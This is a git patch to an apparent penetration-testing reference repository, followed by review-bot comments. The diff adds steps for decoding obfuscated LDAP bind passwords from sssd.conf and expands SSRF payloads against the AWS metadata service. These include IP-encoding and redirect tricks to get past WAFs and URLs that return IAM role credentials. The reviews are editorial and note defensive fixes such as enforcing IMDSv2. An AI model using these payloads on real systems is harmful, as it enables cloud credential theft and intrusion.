From 113afae2904fbab815ec041569bf497f46b10fad Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 27 Jun 2023 15:45:29 +0200 Subject: [PATCH] AWS EC2 Metadata + SSSD token deobfuscate --- .../Active Directory Attack.md | 28 +++++ .../Cloud - AWS Pentest.md | 2 +- Server Side Request Forgery/README.md | 103 +++++++++--------- 3 files changed, 82 insertions(+), 51 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 95a255e..d51d867 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -143,6 +143,7 @@ - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm) - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) + - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf) - [References](#references) ## Tools 
@@ -4276,6 +4277,33 @@ $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 ``` + +## Extract accounts from /etc/sssd/sssd.conf + +> sss_obfuscate converts a given password into human-unreadable format and places it into appropriate domain section of the SSSD config file, usually located at /etc/sssd/sssd.conf + +The obfuscated password is put into "ldap_default_authtok" parameter of a given SSSD domain and the "ldap_default_authtok_type" parameter is set to "obfuscated_password". + +```ini +[sssd] +config_file_version = 2 +... +[domain/LDAP] +... +ldap_uri = ldap://127.0.0.1 +ldap_search_base = ou=People,dc=srv,dc=world +ldap_default_authtok_type = obfuscated_password +ldap_default_authtok = [BASE64_ENCODED_TOKEN] +``` + +De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_deobfuscate](https://github.com/mludvig/sss_deobfuscate) + +```ps1 +./sss_deobfuscate [ldap_default_authtok_base64_encoded] +./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID +``` + + ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 3d47175..fc8d999 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -249,7 +249,7 @@ :warning: Only working with IMDSv1. Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. -In order to usr IMDSv2 you must provide a token. +In order to use IMDSv2 you must provide a token. ```powershell export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` 
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 5ce4365..db9ad9d 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -545,77 +545,80 @@ Example of a PDF attachment using HTML ## SSRF URL for Cloud Instances -### SSRF URL for AWS Bucket +### SSRF URL for AWS -[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) -Interesting path to look for at `http://169.254.169.254` or `http://instance-data` +The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) + +* Old endpoint: `http://169.254.169.254/latest/meta-data/` +* New endpoint requires the header `X-aws-ec2-metadata-token` + ```powershell + export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` + curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" + ``` + +In case of a WAF, you might want to try different ways to connect to the API. 
+* DNS record pointing to the AWS API IP + ```powershell + http://instance-data + http://169.254.169.254 + http://169.254.169.254.nip.io/ + ``` +* HTTP redirect + ```powershell + Static:http://nicob.net/redir6a + Dynamic:http://nicob.net/redir-http-169.254.169.254:80- + ``` +* Encoding the IP to bypass WAF + ```powershell + http://425.510.425.510 Dotted decimal with overflow + http://2852039166 Dotless decimal + http://7147006462 Dotless decimal with overflow + http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal + http://0xA9FEA9FE Dotless hexadecimal + http://0x41414141A9FEA9FE Dotless hexadecimal with overflow + http://0251.0376.0251.0376 Dotted octal + http://0251.00376.000251.0000376 Dotted octal with padding + http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) + http://[::ffff:a9fe:a9fe] IPV6 Compressed + http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded + http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + ``` + + +These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role. 
```powershell -Always here : /latest/meta-data/{hostname,public-ipv4,...} -User data (startup script for auto-scaling) : /latest/user-data -Temporary AWS credentials : /latest/meta-data/iam/security-credentials/ +http://169.254.169.254/latest/meta-data/iam/security-credentials +http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] + +# Examples +http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance +http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy +http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access ``` -DNS record - -```powershell -http://instance-data -http://169.254.169.254 -http://169.254.169.254.nip.io/ -``` - -HTTP redirect - -```powershell -Static:http://nicob.net/redir6a -Dynamic:http://nicob.net/redir-http-169.254.169.254:80- -``` - -Alternate IP encoding - -```powershell -http://425.510.425.510/ Dotted decimal with overflow -http://2852039166/ Dotless decimal -http://7147006462/ Dotless decimal with overflow -http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal -http://0xA9FEA9FE/ Dotless hexadecimal -http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow -http://0251.0376.0251.0376/ Dotted octal -http://0251.00376.000251.0000376/ Dotted octal with padding -http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) -``` - -More urls to include - +This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance. ```powershell http://169.254.169.254/latest/user-data -http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] +``` + +Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties. 
+```powershell http://169.254.169.254/latest/meta-data/ -http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] -http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance http://169.254.169.254/latest/meta-data/ami-id http://169.254.169.254/latest/meta-data/reservation-id http://169.254.169.254/latest/meta-data/hostname http://169.254.169.254/latest/meta-data/public-keys/ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key -http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy -http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access http://169.254.169.254/latest/dynamic/instance-identity/document ``` -AWS SSRF Bypasses -``` -Converted Decimal IP: http://2852039166/latest/meta-data/ -IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/ -IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/ -IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/ -``` - E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance` E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/` + ### SSRF URL for AWS ECS If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.
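Review bot: In the new `## Extract accounts from /etc/sssd/sssd.conf` section of `Methodology and Resources/Active Directory Attack.md`, the command block is fenced as ```ps1 while the rest of this file (and both other files in this patch) tag shell snippets as ```powershell, and `./sss_deobfuscate ...` is a Linux shell invocation in any case; use the file's existing tag (or `bash`) so highlighting stays consistent. The quoted description of `sss_obfuscate` carries no source; link the sss_obfuscate man page beside the quote, the way the section already links mludvig/sss_deobfuscate. The section also never states what access the step needs: sssd checks that `/etc/sssd/sssd.conf` is mode 0600 and owned by root (or the sssd service user) and refuses to start otherwise, so reading `ldap_default_authtok` is a post-root or misconfigured-permissions step, and `obfuscated_password` is reversible encoding rather than protection; one sentence saying so tells readers both when this applies and why storing an LDAP bind password in that file is the thing to fix. Finally, the two consecutive blank `+` lines before `## References` leave a double blank line; one is enough.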
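Review bot: The `usr` to `use` fix in `Methodology and Resources/Cloud - AWS Pentest.md` is correct; while touching this paragraph, the unchanged context line above it gives `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required` with nothing after `--instance-id` or `--profile`, which the CLI rejects because each option expects one argument. Add placeholders, e.g. `--instance-id <INSTANCE_ID> --profile <PROFILE>`, so the command that enforces IMDSv2 can be copied as written.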
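Review bot: Renaming `### SSRF URL for AWS Bucket` to `### SSRF URL for AWS` in `Server Side Request Forgery/README.md` changes the GitHub anchor from `#ssrf-url-for-aws-bucket` to `#ssrf-url-for-aws`, and this patch touches no table-of-contents lines in that README; check the summary at the top of the file and update the link, otherwise it dangles. The new bullets label the two access modes `Old endpoint` and `New endpoint` although the URL is identical in both cases and only the `X-aws-ec2-metadata-token` header differs; call them IMDSv1 and IMDSv2, as `Cloud - AWS Pentest.md` in this same patch does, and repeat that file's caveat that a plain-GET SSRF only reaches IMDSv1, so `--http-token required` is the fix for the instance owner. The sentence `These URLs return a list of IAM roles associated with the instance` describes only the first URL of the block that follows; the `[ROLE NAME]` variant returns the credentials, as the next sentence already says, so make the first sentence singular. Dropping the old `/latest/user-data/iam/security-credentials/[ROLE NAME]` line is a good fix, since user-data is a single blob rather than a directory. The two `+` blank lines after the encoding list and the extra `+` blank line before `### SSRF URL for AWS ECS` leave double blank lines.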